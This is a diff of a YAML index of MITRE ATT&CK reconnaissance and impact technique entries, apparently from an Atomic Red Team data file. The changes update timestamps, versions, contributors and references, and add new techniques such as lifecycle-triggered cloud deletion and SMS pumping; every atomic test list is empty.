+      created: '2020-10-02T17:01:42.558Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1597
+        external_id: T1597
+      - source_name: ZDNET Selling Data
+        description: Cimpanu, C. (2020, May 9). A hacker group is selling more than
+          73 million user records on the dark web. Retrieved October 20, 2020.
+        url: https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1592.003:
     technique:
@@ -67567,7 +68245,7 @@ reconnaissance:
         url: https://arstechnica.com/information-technology/2020/08/intel-is-investigating-the-leak-of-20gb-of-its-source-code-and-private-data/
         description: Goodin, D. & Salter, J. (2020, August 6). More than 20GB of Intel
           source code and proprietary data dumped online. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:22:46.759Z'
       name: Firmware
       description: |-
         Adversaries may gather information about the victim's host firmware that can be used during targeting. Information about host firmware may include a variety of details such as type and versions on specific hosts, which may be used to infer more information about hosts in the environment (ex: configuration, purpose, age/patch level, etc.).
@@ -67583,8 +68261,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1592.002:
     technique:
@@ -67610,7 +68286,7 @@ reconnaissance:
         url: https://threatconnect.com/blog/infrastructure-research-hunting/
         description: 'ThreatConnect. (2020, December 15). Infrastructure Research
           and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T16:33:19.596Z'
       name: Software
       description: |-
         Adversaries may gather information about the victim's host software that can be used during targeting. Information about installed software may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: antivirus, SIEMs, etc.).
@@ -67628,8 +68304,6 @@ reconnaissance:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1593.001:
     technique:
@@ -67651,7 +68325,7 @@ reconnaissance:
         url: https://cyware.com/news/how-hackers-exploit-social-media-to-break-into-your-company-88e8da8e
         description: Cyware Hacker News. (2019, October 2). How Hackers Exploit Social
           Media To Break Into Your Company. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:52:40.958Z'
       name: Social Media
       description: |-
         Adversaries may search social media for information about victims that can be used during targeting. Social media sites may contain various information about a victim organization, such as business announcements as well as information about the roles, locations, and interests of staff.
@@ -67667,12 +68341,10 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1589.001:
     technique:
-      modified: '2023-04-14T23:29:10.396Z'
+      modified: '2024-10-10T13:45:01.069Z'
       name: Credentials
       description: "Adversaries may gather credentials that can be used during targeting.
         Account credentials gathered by adversaries may be those directly associated
@@ -67682,17 +68354,20 @@ reconnaissance:
         elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598).
         Adversaries may also compromise sites then add malicious content designed
         to collect website authentication cookies from visitors.(Citation: ATT ScanBox)
-        Credential information may also be exposed to adversaries via leaks to online
-        or other accessible data sets (ex: [Search Engines](https://attack.mitre.org/techniques/T1593/002),
-        breach dumps, code repositories, etc.).(Citation: Register Deloitte)(Citation:
-        Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation:
-        GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Adversaries
-        may also purchase credentials from dark web or other black-markets. Finally,
-        where multi-factor authentication (MFA) based on out-of-band communications
-        is in use, adversaries may compromise a service provider to gain access to
-        MFA codes and one-time passwords (OTP).(Citation: Okta Scatter Swine 2022)\n\nGathering
-        this information may reveal opportunities for other forms of reconnaissance
-        (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)
+        (Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify
+        Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation:
+        GitHub Gitrob)(Citation: CNET Leaks) Where multi-factor authentication (MFA)
+        based on out-of-band communications is in use, adversaries may compromise
+        a service provider to gain access to MFA codes and one-time passwords (OTP).(Citation:
+        Okta Scatter Swine 2022)\n\nCredential information may also be exposed to
+        adversaries via leaks to online or other accessible data sets (ex: [Search
+        Engines](https://attack.mitre.org/techniques/T1593/002), breach dumps, code
+        repositories, etc.). Adversaries may purchase credentials from dark web markets,
+        such as Russian Market and 2easy, or through access to Telegram channels that
+        distribute logs from infostealer malware.(Citation: Bleeping Computer 2easy
+        2021)(Citation: SecureWorks Infostealers 2023)(Citation: Bleeping Computer
+        Stealer Logs 2023)\n\nGathering this information may reveal opportunities
+        for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)
         or [Phishing for Information](https://attack.mitre.org/techniques/T1598)),
         establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)),
         and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)
@@ -67704,6 +68379,7 @@ reconnaissance:
       - Vinayak Wadhwa, Lucideus
       - Lee Christensen, SpecterOps
       - Toby Kohlenberg
+      - Massimo Giaimo, Würth Group Cyber Defence Center
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
@@ -67714,7 +68390,7 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - PRE
-      x_mitre_version: '1.1'
+      x_mitre_version: '1.2'
       type: attack-pattern
       id: attack-pattern--bc76d0a4-db11-4551-9ac4-01a469cfb161
       created: '2020-10-02T14:55:43.815Z'
@@ -67724,6 +68400,10 @@ reconnaissance:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1589/001
         external_id: T1589.001
+      - source_name: Bleeping Computer 2easy 2021
+        description: Bill Toulas. (2021, December 21). 2easy now a significant dark
+          web marketplace for stolen data. Retrieved October 7, 2024.
+        url: https://www.bleepingcomputer.com/news/security/2easy-now-a-significant-dark-web-marketplace-for-stolen-data/
       - source_name: ATT ScanBox
         description: 'Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework
           Used with Watering Hole Attacks. Retrieved October 19, 2020.'
@@ -67736,6 +68416,10 @@ reconnaissance:
         description: Dylan Ayrey. (2016, December 31). truffleHog. Retrieved October
           19, 2020.
         url: https://github.com/dxa4481/truffleHog
+      - source_name: Bleeping Computer Stealer Logs 2023
+        description: 'Flare. (2023, June 6). Dissecting the Dark Web Supply Chain:
+          Stealer Logs in Context. Retrieved October 10, 2024.'
+        url: https://www.bleepingcomputer.com/news/security/dissecting-the-dark-web-supply-chain-stealer-logs-in-context/
       - source_name: Register Uber
         description: McCarthy, K. (2015, February 28). FORK ME! Uber hauls GitHub
           into court to find who hacked database of 50,000 drivers. Retrieved October
@@ -67758,6 +68442,10 @@ reconnaissance:
           Service Credentials, Hijack Account To Mine Virtual Currency. Retrieved
           October 19, 2020.
         url: https://www.forbes.com/sites/runasandvik/2014/01/14/attackers-scrape-github-for-cloud-service-credentials-hijack-account-to-mine-virtual-currency/#242c479d3196
+      - source_name: SecureWorks Infostealers 2023
+        description: SecureWorks Counter Threat Unit Research Team. (2023, May 16).
+          The Growing Threat from Infostealers. Retrieved October 10, 2024.
+        url: https://www.secureworks.com/research/the-growing-threat-from-infostealers
       - source_name: Register Deloitte
         description: 'Thomson, I. (2017, September 26). Deloitte is a sitting duck:
           Key systems with RDP open, VPN and proxy ''login details leaked''. Retrieved
@@ -67765,9 +68453,8 @@ reconnaissance:
         url: https://www.theregister.com/2017/09/26/deloitte_leak_github_and_google/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1595.003:
     technique:
@@ -67826,7 +68513,7 @@ reconnaissance:
         adversaries may leverage [Data from Cloud Storage](https://attack.mitre.org/techniques/T1530)
         to access valuable information that can be exfiltrated or used to escalate
         privileges and move laterally. "
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-04-15T19:10:23.838Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Wordlist Scanning
       x_mitre_detection: "Monitor for suspicious network traffic that could be indicative
@@ -67846,7 +68533,6 @@ reconnaissance:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1591.004:
     technique:
@@ -67868,7 +68554,7 @@ reconnaissance:
         url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
         description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
           Personal Voicemail Transcripts. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:39:08.904Z'
       name: Identify Roles
       description: |-
         Adversaries may gather information about identities and roles within the victim organization that can be used during targeting. Information about business roles may reveal a variety of targetable details, including identifiable information for key personnel as well as what data/resources they have access to.
@@ -67884,12 +68570,10 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1598:
     technique:
-      modified: '2023-09-08T20:28:49.600Z'
+      modified: '2024-05-31T04:18:44.570Z'
       name: Phishing for Information
       description: "Adversaries may send phishing messages to elicit sensitive information
         that can be used during targeting. Phishing for information is an attempt
@@ -67958,7 +68642,7 @@ reconnaissance:
       - source_name: ACSC Email Spoofing
         description: Australian Cyber Security Centre. (2012, December). Mitigating
           Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
-        url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+        url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
       - source_name: Avertium callback phishing
         description: Avertium. (n.d.). EVERYTHING YOU NEED TO KNOW ABOUT CALLBACK
           PHISHING. Retrieved February 2, 2023.
@@ -68006,31 +68690,12 @@ reconnaissance:
         url: https://unit42.paloaltonetworks.com/examining-vba-initiated-infostealer-campaign/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1595.001:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--db8f5003-3b20-48f0-9b76-123e44208120
-      type: attack-pattern
-      created: '2020-10-02T16:54:23.193Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1595.001
-        url: https://attack.mitre.org/techniques/T1595/001
-      - source_name: Botnet Scan
-        url: https://www.caida.org/publications/papers/2012/analysis_slash_zero/analysis_slash_zero.pdf
-        description: Dainotti, A. et al. (2012). Analysis of a “/0” Stealth Scan from
-          a Botnet. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T13:46:55.039Z'
       name: Scanning IP Blocks
       description: |-
         Adversaries may scan victim IP blocks to gather information that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses.
@@ -68039,19 +68704,41 @@ reconnaissance:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_contributors:
+      - Diego Sappa, Securonix
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet).
 
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
 
         Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
+      - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Traffic Flow'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--db8f5003-3b20-48f0-9b76-123e44208120
+      created: '2020-10-02T16:54:23.193Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1595/001
+        external_id: T1595.001
+      - source_name: Botnet Scan
+        description: Dainotti, A. et al. (2012). Analysis of a “/0” Stealth Scan from
+          a Botnet. Retrieved October 20, 2020.
+        url: https://www.caida.org/publications/papers/2012/analysis_slash_zero/analysis_slash_zero.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1590.001:
     technique:
@@ -68109,7 +68796,6 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1596.005:
     technique:
@@ -68130,7 +68816,7 @@ reconnaissance:
       - source_name: Shodan
         url: https://shodan.io
         description: Shodan. (n.d.). Shodan. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:49:49.260Z'
       name: Scan Databases
       description: |-
         Adversaries may search within public scan databases for information about victims that can be used during targeting. Various online services continuously publish the results of Internet scans/surveys, often harvesting information such as active IP addresses, hostnames, open ports, certificates, and even server banners.(Citation: Shodan)
@@ -68146,8 +68832,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1591.001:
     technique:
@@ -68173,7 +68857,7 @@ reconnaissance:
         url: https://www.sec.gov/edgar/search-and-access
         description: U.S. SEC. (n.d.). EDGAR - Search and Access. Retrieved August
           27, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-27T15:37:09.025Z'
       name: Determine Physical Locations
       description: |-
         Adversaries may gather the victim's physical location(s) that can be used during targeting. Information about physical locations of a target organization may include a variety of details, including where key resources and infrastructure are housed. Physical locations may also indicate what legal jurisdiction and/or authorities the victim operates within.
@@ -68189,8 +68873,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.1'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1598.001:
     technique:
@@ -68214,7 +68896,7 @@ reconnaissance:
         url: https://threatpost.com/facebook-launching-pad-phishing-attacks/160351/
         description: 'O''Donnell, L. (2020, October 20). Facebook: A Top Launching
           Pad For Phishing Attacks. Retrieved October 20, 2020.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:43:12.843Z'
       name: Spearphishing Service
       description: |-
         Adversaries may send spearphishing messages via third-party services to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
@@ -68236,13 +68918,11 @@ reconnaissance:
       - 'Application Log: Application Log Content'
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
 impact:
   T1561.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:32:05.064Z'
       name: Disk Structure Wipe
       description: "Adversaries may corrupt or wipe the disk data structures on a
         hard drive necessary to boot a system; targeting specific critical systems
@@ -68334,13 +69014,12 @@ impact:
         url: https://www.symantec.com/connect/blogs/shamoon-attacks
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1498.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:54:49.943Z'
       name: Direct Network Flood
       description: |-
         Adversaries may attempt to cause a denial of service (DoS) by directly sending a high-volume of network traffic to a target. This DoS attack may also reduce the availability and functionality of the targeted system(s) and network. [Direct Network Flood](https://attack.mitre.org/techniques/T1498/001)s are when one or more systems are used to send a high-volume of network packets towards the targeted service's network. Almost any network protocol may be used for flooding. Stateless protocols such as UDP or ICMP are commonly used but stateful protocols such as TCP can be used as well.
@@ -68349,7 +69028,6 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_deprecated: false
       x_mitre_detection: 'Detection of a network flood can sometimes be achieved before
         the traffic volume is sufficient to cause impact to the availability of the
@@ -68366,17 +69044,12 @@ impact:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Sensor Health: Host Status'
@@ -68401,7 +69074,8 @@ impact:
         url: https://www.justice.gov/opa/pr/seven-iranians-working-islamic-revolutionary-guard-corps-affiliated-entities-charged
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1491.002:
     technique:
@@ -68439,7 +69113,7 @@ impact:
         description: 'Marco Balduzzi, Ryan Flores, Lion Gu, Federico Maggi, Vincenzo
           Ciancaglini, Roel Reyes, Akira Urano. (n.d.). A Deep Dive into Defacement:
           How Geopolitical Events Trigger Web Attacks. Retrieved April 19, 2019.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-25T19:34:37.539Z'
       name: External Defacement
       description: 'An adversary may deface systems external to an organization in
         an attempt to deliver messaging, intimidate, or otherwise mislead an organization
@@ -68473,12 +69147,10 @@ impact:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_impact_type:
       - Integrity
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1499.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:51.289Z'
       name: OS Exhaustion Flood
       description: |-
         Adversaries may launch a denial of service (DoS) attack targeting an endpoint's operating system (OS). A system's OS is responsible for managing the finite resources as well as preventing the entire system from being overwhelmed by excessive demands on its capacity. These attacks do not need to exhaust the actual resources on a system; the attacks may simply exhaust the limits and available resources that an OS self-imposes.
@@ -68543,42 +69215,127 @@ impact:
         url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
-  T1499.003:
+  T1485.001:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
-      - IaaS
-      - Linux
-      - macOS
-      - Google Workspace
+      modified: '2024-10-16T21:27:02.481Z'
+      name: Lifecycle-Triggered Deletion
+      description: "Adversaries may modify the lifecycle policies of a cloud storage
+        bucket to destroy all objects stored within.  \n\nCloud storage buckets often
+        allow users to set lifecycle policies to automate the migration, archival,
+        or deletion of objects after a set period of time.(Citation: AWS Storage Lifecycles)(Citation:
+        GCP Storage Lifecycles)(Citation: Azure Storage Lifecycles) If a threat actor
+        has sufficient permissions to modify these policies, they may be able to delete
+        all objects at once. \n\nFor example, in AWS environments, an adversary with
+        the `PutLifecycleConfiguration` permission may use the `PutBucketLifecycle`
+        API call to apply a lifecycle policy to an S3 bucket that deletes all objects
+        in the bucket after one day.(Citation: Palo Alto Cloud Ransomware) In addition
+        to destroying data for purposes of extortion and [Financial Theft](https://attack.mitre.org/techniques/T1657),
+        adversaries may also perform this action on buckets storing cloud logs for
+        [Indicator Removal](https://attack.mitre.org/techniques/T1070).(Citation:
+        Datadog S3 Lifecycle CloudTrail Logs)"
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - IaaS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Cloud Storage: Cloud Storage Modification'
+      x_mitre_impact_type:
+      - Availability
+      type: attack-pattern
+      id: attack-pattern--1001e0d6-ee09-4dfc-aa90-e9320ffc8fe4
+      created: '2024-09-25T13:16:14.166Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1485/001
+        external_id: T1485.001
+      - source_name: AWS Storage Lifecycles
+        description: AWS. (n.d.). Managing the lifecycle of objects. Retrieved September
+          25, 2024.
+        url: https://docs.aws.amazon.com/AmazonS3/latest/userguide/object-lifecycle-mgmt.html
+      - source_name: GCP Storage Lifecycles
+        description: Google Cloud. (n.d.). Object Lifecycle Management. Retrieved
+          September 25, 2024.
+        url: https://cloud.google.com/storage/docs/lifecycle
+      - source_name: Azure Storage Lifecycles
+        description: Microsoft Azure. (2024, July 3). Configure a lifecycle management
+          policy. Retrieved September 25, 2024.
+        url: https://learn.microsoft.com/en-us/azure/storage/blobs/lifecycle-management-policy-configure?tabs=azure-portal
+      - source_name: Palo Alto Cloud Ransomware
+        description: 'Ofir Balassiano and Ofir Shaty. (2023, November 29). Ransomware
+          in the Cloud: Breaking Down the Attack Vectors. Retrieved September 25,
+          2024.'
+        url: https://www.paloaltonetworks.com/blog/prisma-cloud/ransomware-data-protection-cloud/
+      - source_name: Datadog S3 Lifecycle CloudTrail Logs
+        description: Stratus Red Team. (n.d.). CloudTrail Logs Impairment Through
+          S3 Lifecycle Rule. Retrieved September 25, 2024.
+        url: https://stratus-red-team.cloud/attack-techniques/AWS/aws.defense-evasion.cloudtrail-lifecycle-rule/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--18cffc21-3260-437e-80e4-4ab8bf2ba5e9
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1496.003:
+    technique:
+      modified: '2024-10-16T17:45:14.210Z'
+      name: SMS Pumping
+      description: |-
+        Adversaries may leverage messaging services for SMS pumping, which may impact system and/or hosted service availability.(Citation: Twilio SMS Pumping) SMS pumping is a type of telecommunications fraud whereby a threat actor first obtains a set of phone numbers from a telecommunications provider, then leverages a victim’s messaging infrastructure to send large amounts of SMS messages to numbers in that set. By generating SMS traffic to their phone number set, a threat actor may earn payments from the telecommunications provider.(Citation: Twilio SMS Pumping Fraud)
+
+        Threat actors often use publicly available web forms, such as one-time password (OTP) or account verification fields, in order to generate SMS traffic. These fields may leverage services such as Twilio, AWS SNS, and Amazon Cognito in the background.(Citation: Twilio SMS Pumping)(Citation: AWS RE:Inforce Threat Detection 2024) In response to the large quantity of requests, SMS costs may increase and communication channels may become overwhelmed.(Citation: Twilio SMS Pumping)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - SaaS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Application Log: Application Log Content'
+      x_mitre_impact_type:
+      - Availability
       type: attack-pattern
-      created: '2020-02-20T15:35:00.025Z'
+      id: attack-pattern--130d4494-b2d6-4040-bcea-6e59f05222fe
+      created: '2024-09-25T13:53:19.586Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1499.003
-        url: https://attack.mitre.org/techniques/T1499/003
-      - source_name: Arbor AnnualDoSreport Jan 2018
-        url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
-        description: Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill
-          Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight
-          into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide
-          Infrastructure Security Report. Retrieved April 22, 2019.
-      - source_name: Cisco DoSdetectNetflow
-        url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
-        description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
-          Retrieved April 25, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+        url: https://attack.mitre.org/techniques/T1496/003
+        external_id: T1496.003
+      - source_name: AWS RE:Inforce Threat Detection 2024
+        description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+          techniques for proactive threat detection. Retrieved September 25, 2024.
+        url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
+      - source_name: Twilio SMS Pumping
+        description: Twilio. (2024, April 10). What Is SMS Pumping Fraud and How to
+          Stop It. Retrieved September 25, 2024.
+        url: https://www.twilio.com/en-us/blog/sms-pumping-fraud-solutions
+      - source_name: Twilio SMS Pumping Fraud
+        description: Twilio. (n.d.). What is SMS Pumping Fraud?. Retrieved September
+          25, 2024.
+        url: https://www.twilio.com/docs/glossary/what-is-sms-pumping-fraud
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1499.003:
+    technique:
+      modified: '2024-10-15T15:41:49.168Z'
       name: Application Exhaustion Flood
       description: 'Adversaries may target resource intensive features of applications
         to cause a denial of service (DoS), denying availability to those applications.
@@ -68589,13 +69346,20 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.
 
         In addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.2'
